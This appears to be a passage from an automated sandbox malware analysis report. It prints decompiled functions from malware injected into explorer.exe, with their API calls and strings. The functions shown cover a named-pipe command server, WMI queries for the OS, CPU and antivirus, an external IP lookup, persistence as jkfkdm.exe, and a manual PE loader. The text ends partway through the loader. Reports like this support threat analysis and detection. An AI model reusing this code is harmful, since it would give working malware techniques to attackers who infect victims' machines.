0x0150253d
0x0150253d
0x01502540
0x01502543
0x01502543
0x00000000

APIs

WaitForSingleObject.KERNEL32(5DCC4E67), ref: 015023A9
#18.WS2_32(00000000,?,?,?,?), ref: 0150247D
WaitForSingleObject.KERNEL32(00000000), ref: 0150248C
#111.WS2_32 ref: 0150249E
#151.WS2_32(?,?), ref: 015024C9
#151.WS2_32(?,?,?,?), ref: 015024F7

Part of subcall function 01501496: #16.WS2_32(?,?,0000100A,00000000), ref: 015014D3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: #151ObjectSingleWait$#111
String ID:
API String ID: 1767988692-0
Opcode ID: 1532ec39696cf9aef48e8b00de0e41454e7341206d7b47a67905a73f082c08ed
Instruction ID: 9b4a38a7385ba9bd26dbc6dfb7abda7f8a2b9e97a3f0513997c4e975f4a2f3a8
Opcode Fuzzy Hash: 1532ec39696cf9aef48e8b00de0e41454e7341206d7b47a67905a73f082c08ed
Instruction Fuzzy Hash: 1961C4B2D1111A9BDB27DFE8E9989DDBBB8BB48310F0141AAE115DF280DB30D644CB54

Uniqueness

Uniqueness Score: 100.00%

Function 015053AB, Relevance: 9.1, APIs: 6, Instructions: 127
pipefilestringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E015053AB() {
				signed int _v8;
				char _v12;
				long _v16;
				char _v148;
				char _v152;
				int _t28;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t43;
				char _t44;
				void* _t50;
				long _t59;
				void* _t70;
				signed int _t72;
				void* _t73;
				void* _t74;

				while(1) {
					_v16 = 0;
					_t28 = ConnectNamedPipe( *0x153a980, 0); // executed
					if(_t28 != 0) {
						goto L3;
					}
					_t59 = GetLastError();
					asm("sbb eax, eax");
					if( ~(_t59 - 0x217) + 1 != 0) {
						goto L3;
					}
					__eflags = 0;
					return 0;
					L3:
					if(ReadFile( *0x153a980,  *0x1537988, 0x80000,  &_v16, 0) == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t33 =  *0x1537988; // 0x1840020
						if(( *_t33 & 0x0000ffff) == 1) {
							_t67 =  &_v8;
							_t72 = 1;
							_t35 = E015171A0(_t33 + 8, 0x20, 1,  &_v8);
							_t74 = _t73 + 0x10;
							_v12 = _t35;
							if(_t35 != 0) {
								_t68 = _v8;
								if(_v8 <= 1) {
									_push(0);
									_push(0);
									_push(0);
									_t43 = E01513E60(__eflags,  *_t35);
									_pop(_t67);
									_push(_t43);
									_t44 = E0150351D();
									_t74 = _t74 + 0x10;
									_v152 = _t44;
								} else {
									_t70 = E01513960(_t68, _t68 * 4 - 4);
									_pop(_t67);
									if(_t70 != 0) {
										if(_v8 > 1) {
											do {
												 *((intOrPtr*)(_t70 + _t72 * 4 - 4)) = E01516C30( &_v8,  *(_v12 + _t72 * 4), lstrlenA( *(_v12 + _t72 * 4)));
												_t72 = _t72 + 1;
												_pop(_t67);
												_t85 = _t72 - _v8;
											} while (_t72 < _v8);
										}
										_push(0);
										_push(_v8 - 1);
										_t50 = E01513E60(_t85,  *_v12);
										_t67 = _t70;
										_push(_t50);
										_v152 = E0150351D();
										E01517530( &_v12,  &_v8);
										_t74 = _t74 + 0x18;
									}
								}
							}
							_t36 =  *0x1537988; // 0x1840020
							E01513D60(_t67,  &_v148, _t36 + 8, 0x80);
							E0151DDF0(_t85,  *0x153a980, 2,  &_v152, 0x84);
							_t73 = _t74 + 0x1c;
							E01507294();
						}
					}
					DisconnectNamedPipe( *0x153a980);
				}
			}

0x015053b9
0x015053c0
0x015053c3
0x015053cb
0x00000000
0x00000000
0x015053cd
0x015053da
0x015053dd
0x00000000
0x00000000
0x01505524
0x01505528
0x015053e3
0x01505401
0x0150550b
0x01505410
0x01505410
0x01505419
0x0150541f
0x01505425
0x0150542d
0x01505432
0x01505435
0x0150543a
0x01505440
0x01505445
0x015054b4
0x015054b5
0x015054b6
0x015054b9
0x015054be
0x015054bf
0x015054c0
0x015054c5
0x015054c8
0x01505447
0x01505454
0x01505456
0x01505459
0x0150545e
0x01505460
0x01505478
0x0150547c
0x0150547e
0x0150547f
0x0150547f
0x01505460
0x01505487
0x01505489
0x01505490
0x01505495
0x01505496
0x0150549c
0x015054aa
0x015054af
0x015054af
0x01505459
0x01505445
0x015054ce
0x015054e3
0x015054fc
0x01505501
0x01505504
0x01505504
0x01505419
0x01505517
0x01505517

APIs

ConnectNamedPipe.KERNEL32(00000000), ref: 015053C3
GetLastError.KERNEL32 ref: 015053CD
ReadFile.KERNEL32(00080000,?,00000000), ref: 015053F9
lstrlenA.KERNEL32(?), ref: 01505466
GetLastError.KERNEL32 ref: 0150550B
DisconnectNamedPipe.KERNEL32 ref: 01505517

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLastNamedPipe$ConnectDisconnectFileReadlstrlen
String ID:
API String ID: 2071080929-0
Opcode ID: 8ddd3fdcfe7e3b975c477bcec07013982314179e250bffb311f3d4cd815bd000
Instruction ID: 7f255a26b0d4a64b48b90f593713a143f183c4d034ec6cfa91ed12795c80dc5f
Opcode Fuzzy Hash: 8ddd3fdcfe7e3b975c477bcec07013982314179e250bffb311f3d4cd815bd000
Instruction Fuzzy Hash: BD419272910219BFEB22AFE8DC44EAE7B7DFB54210F010065E215DF195E7319944DF60

Uniqueness

Uniqueness Score: 8.94%

Function 01521140, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48
UNIQUE

Download Yara Rule

C-Code - Quality: 47%

			E01521140() {
				intOrPtr _v12;
				char _v20;
				char _v24;
				WCHAR* _v28;
				void* _t13;
				char _t14;
				void* _t16;
				WCHAR* _t20;
				void* _t29;
				void* _t30;
				void* _t31;

				_v28 = 0;
				_t14 = E01520E90(_t13, L"ROOT\\CIMV2"); // executed
				_t30 = _t29 + 4;
				_v24 = _t14;
				if(_v24 != 0) {
					_t16 = E01521040( *_v24, L"SELECT * FROM Win32_OperatingSystem", L"Caption",  &_v20); // executed
					_t31 = _t30 + 0x10;
					if(_t16 == 0) {
						L8:
						E01520FE0( &_v24);
						return _v28;
					}
					_t20 = E01516C90(_v12);
					_t31 = _t31 + 4;
					_v28 = _t20;
					if(_v28 == 0) {
						L7:
						__imp__#9( &_v20);
						goto L8;
					}
					StrTrimW(_v28, " ");
					while(0 != 0) {
					}
					goto L7;
				}
				return 0;
			}

0x01521146
0x01521152
0x01521157
0x0152115a
0x01521161
0x0152117b
0x01521180
0x01521185
0x015211bb
0x015211bf
0x00000000
0x015211c7
0x0152118b
0x01521190
0x01521193
0x0152119a
0x015211b1
0x015211b5
0x00000000
0x015211b5
0x015211a5
0x015211ab
0x015211af
0x00000000
0x015211ab
0x00000000

APIs

Part of subcall function 01520E90: CoInitializeEx.OLE32(00000000,00000000), ref: 01520EA8
Part of subcall function 01520E90: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 01520ECF
Part of subcall function 01520E90: CoCreateInstance.OLE32(0153008C,00000000,00000001,0152FFBC,00000000), ref: 01520EF6

StrTrimW.SHLWAPI(00000000,0152A3B8), ref: 015211A5
#9.OLEAUT32(?), ref: 015211B5

Strings

Caption, xrefs: 0152116B
SELECT * FROM Win32_OperatingSystem, xrefs: 01521170
ROOT\CIMV2, xrefs: 0152114D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$CreateInstanceSecurityTrim
String ID: Caption$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem
API String ID: 2968342778-2798522117
Opcode ID: d36f20df1ddb7aa7a5a9a8b25ae1adf796e04c8ab08c617f76dce4b01d6c846e
Instruction ID: 69c5ccd0684690ff447ed7facb1004e017a7506f80af33b033d6cd57ee76d89b
Opcode Fuzzy Hash: d36f20df1ddb7aa7a5a9a8b25ae1adf796e04c8ab08c617f76dce4b01d6c846e
Instruction Fuzzy Hash: 220196B3D0022A9BDF10EBA4EC85ABF7B74BB56304F500418D501AF2C0E6359644C7D2

Uniqueness

Uniqueness Score: 100.00%

Function 015211D0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48
UNIQUE

Download Yara Rule

C-Code - Quality: 47%

			E015211D0() {
				intOrPtr _v12;
				char _v20;
				WCHAR* _v24;
				char _v28;
				void* _t13;
				char _t14;
				void* _t16;
				WCHAR* _t20;
				void* _t29;
				void* _t30;
				void* _t31;

				_v24 = 0;
				_t14 = E01520E90(_t13, L"root\\SecurityCenter2"); // executed
				_t30 = _t29 + 4;
				_v28 = _t14;
				if(_v28 != 0) {
					_t16 = E01521040( *_v28, L"SELECT * FROM AntiVirusProduct", L"displayName",  &_v20); // executed
					_t31 = _t30 + 0x10;
					if(_t16 == 0) {
						L8:
						E01520FE0( &_v28);
						return _v24;
					}
					_t20 = E01516C90(_v12);
					_t31 = _t31 + 4;
					_v24 = _t20;
					if(_v24 == 0) {
						L7:
						__imp__#9( &_v20);
						goto L8;
					}
					StrTrimW(_v24, " ");
					while(0 != 0) {
					}
					goto L7;
				}
				return 0;
			}

0x015211d6
0x015211e2
0x015211e7
0x015211ea
0x015211f1
0x0152120b
0x01521210
0x01521215
0x0152124b
0x0152124f
0x00000000
0x01521257
0x0152121b
0x01521220
0x01521223
0x0152122a
0x01521241
0x01521245
0x00000000
0x01521245
0x01521235
0x0152123b
0x0152123f
0x00000000
0x0152123b
0x00000000

APIs

Part of subcall function 01520E90: CoInitializeEx.OLE32(00000000,00000000), ref: 01520EA8
Part of subcall function 01520E90: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 01520ECF
Part of subcall function 01520E90: CoCreateInstance.OLE32(0153008C,00000000,00000001,0152FFBC,00000000), ref: 01520EF6

StrTrimW.SHLWAPI(00000000,0152A3B8), ref: 01521235
#9.OLEAUT32(?), ref: 01521245

Strings

root\SecurityCenter2, xrefs: 015211DD
displayName, xrefs: 015211FB
SELECT * FROM AntiVirusProduct, xrefs: 01521200

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$CreateInstanceSecurityTrim
String ID: SELECT * FROM AntiVirusProduct$displayName$root\SecurityCenter2
API String ID: 2968342778-1596644875
Opcode ID: e091d209a369b2948fab207192c7e5a6a0bd69cc61640c5c28a011a5343bebfa
Instruction ID: 6ade20ecc1f7cf0051e67228457e1a2c1a913dedad26272a982dc7945ab08772
Opcode Fuzzy Hash: e091d209a369b2948fab207192c7e5a6a0bd69cc61640c5c28a011a5343bebfa
Instruction Fuzzy Hash: 780180F7D0422A9BDF14EBA5D885ABF7774BB57304F500428E901BF2C0E635A644C7A2

Uniqueness

Uniqueness Score: 100.00%

Function 01521260, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48
UNIQUE

Download Yara Rule

C-Code - Quality: 47%

			E01521260() {
				intOrPtr _v12;
				char _v20;
				WCHAR* _v24;
				char _v28;
				void* _t13;
				char _t14;
				void* _t16;
				WCHAR* _t20;
				void* _t29;
				void* _t30;
				void* _t31;

				_v24 = 0;
				_t14 = E01520E90(_t13, L"ROOT\\CIMV2"); // executed
				_t30 = _t29 + 4;
				_v28 = _t14;
				if(_v28 != 0) {
					_t16 = E01521040( *_v28, L"SELECT * FROM Win32_Processor", L"Name",  &_v20); // executed
					_t31 = _t30 + 0x10;
					if(_t16 == 0) {
						L8:
						E01520FE0( &_v28);
						return _v24;
					}
					_t20 = E01516C90(_v12);
					_t31 = _t31 + 4;
					_v24 = _t20;
					if(_v24 == 0) {
						L7:
						__imp__#9( &_v20);
						goto L8;
					}
					StrTrimW(_v24, " ");
					while(0 != 0) {
					}
					goto L7;
				}
				return 0;
			}

0x01521266
0x01521272
0x01521277
0x0152127a
0x01521281
0x0152129b
0x015212a0
0x015212a5
0x015212db
0x015212df
0x00000000
0x015212e7
0x015212ab
0x015212b0
0x015212b3
0x015212ba
0x015212d1
0x015212d5
0x00000000
0x015212d5
0x015212c5
0x015212cb
0x015212cf
0x00000000
0x015212cb
0x00000000

APIs

Part of subcall function 01520E90: CoInitializeEx.OLE32(00000000,00000000), ref: 01520EA8
Part of subcall function 01520E90: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 01520ECF
Part of subcall function 01520E90: CoCreateInstance.OLE32(0153008C,00000000,00000001,0152FFBC,00000000), ref: 01520EF6

StrTrimW.SHLWAPI(00000000,0152A3B8), ref: 015212C5
#9.OLEAUT32(?), ref: 015212D5

Strings

SELECT * FROM Win32_Processor, xrefs: 01521290
ROOT\CIMV2, xrefs: 0152126D
Name, xrefs: 0152128B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$CreateInstanceSecurityTrim
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_Processor
API String ID: 2968342778-2032427135
Opcode ID: ad1413b8eb8d953c0f1f156fe536c18aa91cb1ef1449ecba414ab66c4ac0fe7c
Instruction ID: f58ab1c11444d1df1c497e33c3c18c26aae27c4e0d2f4f6a40aec911d188f3b2
Opcode Fuzzy Hash: ad1413b8eb8d953c0f1f156fe536c18aa91cb1ef1449ecba414ab66c4ac0fe7c
Instruction Fuzzy Hash: DB0121F3D0422A9BDB10EBA5D885ABF7774BB57204F540418E901BF180E6759644C7A1

Uniqueness

Uniqueness Score: 100.00%

Function 01506849, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39
UNIQUE

Download Yara Rule

C-Code - Quality: 59%

			E01506849(void* __ecx, void* __fp0) {
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t16;

				_t16 = __fp0;
				_t7 = __ecx;
				_t8 = E015088F6();
				_t11 = _t8;
				if(_t8 != 0) {
					L5:
					__imp__#12(_t8);
					E01515AF0(0x27, _t1);
					E01515C00(_t7, 0, "jkfkdm"); // executed
					return _t8;
				} else {
					_t5 = E01515B10(__ecx, _t11, 0x27);
					_pop(_t7);
					if(_t5 == 0) {
						L4:
						_t1 = E0150678F(_t16, "http://www.ip-adress.com", "IP address is: <strong>", "<"); // executed
						_t8 = _t1;
						_t9 = _t9 + 0xc;
						if(_t8 == 0) {
							__eflags = 0;
							return 0;
						}
						goto L5;
					} else {
						__imp__#11(_t5);
						if(_t5 == 0xffffffff || _t5 == 0) {
							goto L4;
						} else {
							return _t5;
						}
					}
				}
			}

0x01506849
0x01506849
0x0150684f
0x01506851
0x01506853
0x0150688e
0x0150688f
0x01506898
0x015068a4
0x015068af
0x01506855
0x01506857
0x0150685c
0x0150685f
0x01506871
0x01506880
0x01506885
0x01506887
0x0150688c
0x015068b0
0x00000000
0x015068b0
0x00000000
0x01506861
0x01506862
0x0150686b
0x00000000
0x015068b3
0x015068b3
0x015068b3
0x0150686b
0x0150685f

APIs

#11.WS2_32(00000000,?,015068D1,01501F74,?), ref: 01506862
#12.WS2_32(00000000,?,015068D1,01501F74,?), ref: 0150688F

Strings

jkfkdm, xrefs: 0150689D
http://www.ip-adress.com, xrefs: 0150687B
IP address is: , xrefs: 01506876

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: IP address is: $http://www.ip-adress.com$jkfkdm
API String ID: 0-3606349548
Opcode ID: 21d1bab951aa0455347338add5b6284c0d8f8f0640dd1db40f07c9ea25e76045
Instruction ID: 103e734d3b3d3a939eb8f2e86bd3b61bb2197018f4fb9ce0a2816043b5e09c7f
Opcode Fuzzy Hash: 21d1bab951aa0455347338add5b6284c0d8f8f0640dd1db40f07c9ea25e76045
Instruction Fuzzy Hash: FFF082A2F846331AFA2332F82C5AB6E11843F92961F490624FD14FF5C9FA54CA6102D6

Uniqueness

Uniqueness Score: 100.00%

Function 01520E90, Relevance: 7.6, APIs: 5, Instructions: 129comUNIQUE

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 01520EA8
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 01520ECF
CoCreateInstance.OLE32(0153008C,00000000,00000001,0152FFBC,00000000), ref: 01520EF6
#2.OLEAUT32(00000000), ref: 01520F14
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 01520F62

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$BlanketCreateInstanceProxySecurity
String ID:
API String ID: 1719769963-0
Opcode ID: 3bfc0f0df9aea82453b73f1492c3174e8a682bfb160ab0f0620fc49a51859ecd
Instruction ID: d0fe9bb66958da81f2ffd5ca78d129c156055efde19b8e34aece219ad75e9a6a
Opcode Fuzzy Hash: 3bfc0f0df9aea82453b73f1492c3174e8a682bfb160ab0f0620fc49a51859ecd
Instruction Fuzzy Hash: 5A416D76A85219EFEB10DF94C845FAEB7B0BB4A700F108459F621AF2C4D7B46A84CF41

Uniqueness

Uniqueness Score: 100.00%

Function 01518B80, Relevance: 7.6, APIs: 5, Instructions: 103
stringUNIQUE

Download Yara Rule

C-Code - Quality: 20%

			E01518B80(intOrPtr _a4, signed int* _a8) {
				void* _v8;
				int _v12;
				signed int* _v16;
				void _v538;
				short _v540;
				void* _t39;
				void* _t51;
				short _t53;

				_v16 = _a8;
				_t53 =  *0x152a6e0; // 0x0
				_v540 = _t53;
				memset( &_v538, 0, 0x206);
				_v12 = 0;
				_v8 = OpenProcess(0x1410, 0,  *(_a4 + 8));
				if(_v8 != 0) {
					if( *0x153a9ec == 0) {
						_push(0x103);
						_push( &_v540);
						_push(0);
						_t39 = _v8;
						_push(_t39);
						L0152169E();
						if(_t39 == 0) {
							while(0 != 0) {
							}
							_v540 = 0;
						}
					} else {
						_v12 = 0x103;
						_t51 =  *0x153a9ec(_v8, 0,  &_v540,  &_v12); // executed
						if(_t51 == 0) {
							while(0 != 0) {
							}
							_v540 = 0;
						}
					}
					CloseHandle(_v8); // executed
				} else {
					while(0 != 0) {
					}
				}
				if((_v540 & 0x0000ffff) == 0) {
					lstrcpynW( &_v540, _a4 + 0x24, 0x103);
				}
				 *((intOrPtr*)( *_v16 * 0xc + _v16[1])) = E01516C90(_a4 + 0x24);
				 *((intOrPtr*)(_v16[1] + 4 +  *_v16 * 0xc)) = E01516C90( &_v540);
				 *_v16 =  *_v16 + 1;
				return 1;
			}

0x01518b8c
0x01518b8f
0x01518b96
0x01518bab
0x01518bb3
0x01518bce
0x01518bd5
0x01518be6
0x01518c1b
0x01518c26
0x01518c27
0x01518c29
0x01518c2c
0x01518c2d
0x01518c34
0x01518c36
0x01518c3a
0x01518c3e
0x01518c3e
0x01518be8
0x01518be8
0x01518c00
0x01518c08
0x01518c0a
0x01518c0e
0x01518c12
0x01518c12
0x01518c19
0x01518c49
0x01518bd7
0x01518bd7
0x01518bdb
0x01518bdd
0x01518c58
0x01518c6d
0x01518c6d
0x01518c90
0x01518cb0
0x01518cbf
0x01518cc9

APIs

memset.MSVCRT(?,00000000,00000206), ref: 01518BAB
OpenProcess.KERNEL32(00001410,00000000,?), ref: 01518BC8
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000103), ref: 01518C2D
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000103), ref: 01518C49
lstrcpynW.KERNEL32(?,-00000024,00000103), ref: 01518C6D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcesslstrcpynmemset
String ID:
API String ID: 3264764166-0
Opcode ID: cc3569274f407169210b55406c0238302b1dab279db51fe731b18d815b9581ea
Instruction ID: 607a8488d0a9caebb496e33002ab4f0d80ead445b8df34ea6c943ef8ad866ca2
Opcode Fuzzy Hash: cc3569274f407169210b55406c0238302b1dab279db51fe731b18d815b9581ea
Instruction Fuzzy Hash: EA417975A41108EBEB25CF64C889BEEB775FF54308F108599E9069F385E770AA85CF80

Uniqueness

Uniqueness Score: 23.02%

Function 003F2270, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151synchronizationUNIQUE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000D4,00007530), ref: 003F23D6

Strings

C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 003F2441
0, xrefs: 003F22B6
jkfkdm, xrefs: 003F229A, 003F2312, 003F2317, 003F23C0

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ObjectSingleWait
String ID: 0$C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$jkfkdm
API String ID: 24740636-1168439957
Opcode ID: 0423708274e3615bee77bf26e0707827748f74b69646faa74ac83288c3219bb1
Instruction ID: f35125a3eaa8c552b2b7a597e44d11ded4ec7e790d8f805620afd390d306ddf0
Opcode Fuzzy Hash: 0423708274e3615bee77bf26e0707827748f74b69646faa74ac83288c3219bb1
Instruction Fuzzy Hash: B051C1B894020CEBDB66DBA1DD0ABBB3774BB04704F244437E7027A9E0D7B94446CB5A

Uniqueness

Uniqueness Score: 100.00%

Function 0151DAB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(0152FA5C,00000001,00000000,00000000), ref: 0151DAFA
GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000,0152FA5C,00000001,00000000,00000000), ref: 0151DB13
SetSecurityInfo.ADVAPI32(00000006,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0151DB31

Strings

S:(ML;;NW;;;LW), xrefs: 0151DAB6

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$ConvertInfoSaclString
String ID: S:(ML;;NW;;;LW)
API String ID: 1469150652-495562761
Opcode ID: fc3ec8c3bc2be1f850707d2ff412d2e1aebe3a193f91cdb511952837b1e07825
Instruction ID: 70c76f19d94c4c89f6ffd26f274e4ab6fd2eb4facf21da4301cd865841682dde
Opcode Fuzzy Hash: fc3ec8c3bc2be1f850707d2ff412d2e1aebe3a193f91cdb511952837b1e07825
Instruction Fuzzy Hash: 09210E75A04209ABEF11CFD4C899BFFBBB4BB48704F144509E612AF284D7B99644CFA4

Uniqueness

Uniqueness Score: 3.53%

Function 01518CD0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E01518CD0(void* __ecx) {
				CHAR* _v8;
				struct HINSTANCE__* _v12;
				CHAR* _v16;
				intOrPtr _t20;

				_v16 = 0;
				_v8 = 0;
				_v16 = E01513960(__ecx, 8);
				if(_v16 != 0) {
					_t20 = E01513960(__ecx, 0x2000);
					_t35 = _v16;
					 *((intOrPtr*)(_v16 + 4)) = _t20;
					if( *((intOrPtr*)(_v16 + 4)) != 0) {
						_v8 = E01515350(_t35, 0x152c);
						if(_v8 != 0) {
							_v12 = LoadLibraryA("kernel32.dll");
							if(_v12 != 0) {
								 *0x153a9ec = GetProcAddress(_v12, _v8);
								E01515460( &_v8);
								E0151B570(E01518B80, _v16); // executed
								FreeLibrary(_v12);
								return _v16;
							}
							return 0;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x01518cd6
0x01518cdd
0x01518cee
0x01518cf5
0x01518d03
0x01518d0b
0x01518d0e
0x01518d18
0x01518d2b
0x01518d32
0x01518d43
0x01518d4a
0x01518d5e
0x01518d67
0x01518d78
0x01518d84
0x00000000
0x01518d8a
0x00000000
0x01518d4c
0x00000000
0x01518d34
0x00000000
0x01518d1a
0x00000000

Strings

kernel32.dll, xrefs: 01518D38

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AllocHeap
String ID: kernel32.dll
API String ID: 4292702814-1793498882
Opcode ID: 35465245cdb962393ae4d11ebc6ce8f62ef56865d25bd25af6683eec9c136238
Instruction ID: 8be86a86b56a999f71a68ecf80c3193a1613a81d14f6de954036af9041bf0469
Opcode Fuzzy Hash: 35465245cdb962393ae4d11ebc6ce8f62ef56865d25bd25af6683eec9c136238
Instruction Fuzzy Hash: 0011D0B9D00309FFEB21EFA4D845B9DB7B0BB55304F5488A8D806AF289E7749608CF51

Uniqueness

Uniqueness Score: 100.00%

Function 015066F6, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25
fileUNIQUE

Download Yara Rule

C-Code - Quality: 75%

			E015066F6(void* __eflags) {
				short _v524;
				void* _t7;

				_push("jkfkdm");
				E01513CA0( &_v524, 0x104, L"%s\\~%S.tmp", "C:\Users\Luke\AppData\Local\Temp");
				_t7 = CreateFileW( &_v524, 0xc0000000, 0, 0, 4, 0, 0); // executed
				 *0x1535140 = _t7;
				return 0;
			}

0x015066ff
0x0150671a
0x01506736
0x0150673c
0x01506744

APIs

Part of subcall function 01513CA0: wvnsprintfW.SHLWAPI(?,?,?,?,?,?,?,?,TEMP), ref: 01513CCE
Part of subcall function 01513CA0: lstrlenW.KERNEL32(00000000), ref: 01513CF5

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000), ref: 01506736

Strings

%s\~%S.tmp, xrefs: 01506709
jkfkdm, xrefs: 015066FF
C:\Users\user\AppData\Local\Temp, xrefs: 01506704

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFilelstrlenwvnsprintf
String ID: %s\~%S.tmp$C:\Users\user\AppData\Local\Temp$jkfkdm
API String ID: 4235824794-3404263370
Opcode ID: 5e7b741d08a9c6b3d0dfe6d680c20ebc46d15d11bdcda7ef2a8a6b05f4889c70
Instruction ID: b03ad2efa710c38244d7dbe157a6eee667bf1040bef3a13df11292a58b62f306
Opcode Fuzzy Hash: 5e7b741d08a9c6b3d0dfe6d680c20ebc46d15d11bdcda7ef2a8a6b05f4889c70
Instruction Fuzzy Hash: 28E0C2F6A903083BF760EA719C0BFB373ACB700618F410660BE90EB181FBB4D95446A0

Uniqueness

Uniqueness Score: 100.00%

Function 003F6BB0, Relevance: 6.2, APIs: 4, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E003F6BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				signed short* _v32;
				intOrPtr _v36;
				unsigned int _v40;
				unsigned int _v44;
				intOrPtr* _v48;
				signed short _v52;
				signed int _v53;
				intOrPtr _v60;
				signed int _v64;
				signed int* _v68;
				struct HINSTANCE__* _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				_Unknown_base(*)()* _v84;
				struct HINSTANCE__* _t154;
				intOrPtr _t172;

				_v8 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v16 = _v8;
				_t172 = _a4 -  *((intOrPtr*)(_v16 + 0x34));
				_v12 = _t172;
				if(_t172 == 0) {
					L13:
					while(0 != 0) {
					}
					if( *((intOrPtr*)(_v16 + 0x80)) == 0) {
						L35:
						_v20 =  *((intOrPtr*)(_v16 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v20;
						}
						 *((intOrPtr*)(_v16 + 0x34)) = _a4;
						return _v20(_a4, 1, _a8);
					}
					_v64 = 0x80000000;
					_v76 = _a4 +  *((intOrPtr*)(_v16 + 0x80));
					while( *((intOrPtr*)(_v76 + 0xc)) != 0) {
						_v72 = GetModuleHandleA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						if(_v72 == 0) {
							_t154 = LoadLibraryA( *((intOrPtr*)(_v76 + 0xc)) + _a4); // executed
							_v72 = _t154;
						}
						if(_v72 != 0) {
							if( *_v76 == 0) {
								_v68 =  *((intOrPtr*)(_v76 + 0x10)) + _a4;
							} else {
								_v68 =  *_v76 + _a4;
							}
							_v60 = 0;
